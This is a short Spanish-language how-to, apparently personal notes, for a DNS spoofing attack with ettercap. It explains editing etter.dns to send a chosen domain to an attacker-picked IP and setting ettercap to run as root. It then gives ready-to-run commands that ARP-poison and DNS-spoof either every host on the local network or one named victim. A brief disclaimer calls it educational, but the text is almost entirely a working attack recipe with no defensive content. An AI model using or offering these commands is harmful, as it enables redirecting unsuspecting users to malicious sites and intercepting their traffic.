#SpoofDNS
##Vamos a realizar un ataque de DNS para redireccionar a la victima a una página que nosotros queramos
###Esto tiene un caracter lectivo y recordatorio, en ningún caso es para hacer un mal uso de éste.

#PREPARATIVOS


En primer lugar, tenemos que editar el fichero /etc/ettercp/etter.dns poniendo la página que queramos redireccionar A y la IP de la página que querramos que visite nuestra victima. ```Si queremos saber una IP, usamos el comando nslookup```


En /etc/ettercap/etter.conf ```ponemos en ec_uid y ec_gid un 0``` 


##LANZANDO EL COMANDO

El comando en cuestión es: ```ettercap -T -q -i wlan0 -P dns_spoof -M arp ///```.

Con este comando lo que hacemos es lanzar el ataque a TODOS los equipos conectados en nuestra misma red.
Si queremos realizar el "spoof" a un equipo concreto, basta con usar: ```ettercap -T -q -i [INTERFAZ_RED] -P dns_spoof -M arp /[IP_ROUTER]/[IP_EQUIPO_VICTIMA]```.

#####Ojo con la interfaz de red, wlan0 es en mi caso por usar WIFI, podría ser eth0, eth1, etc. (ifconfig)

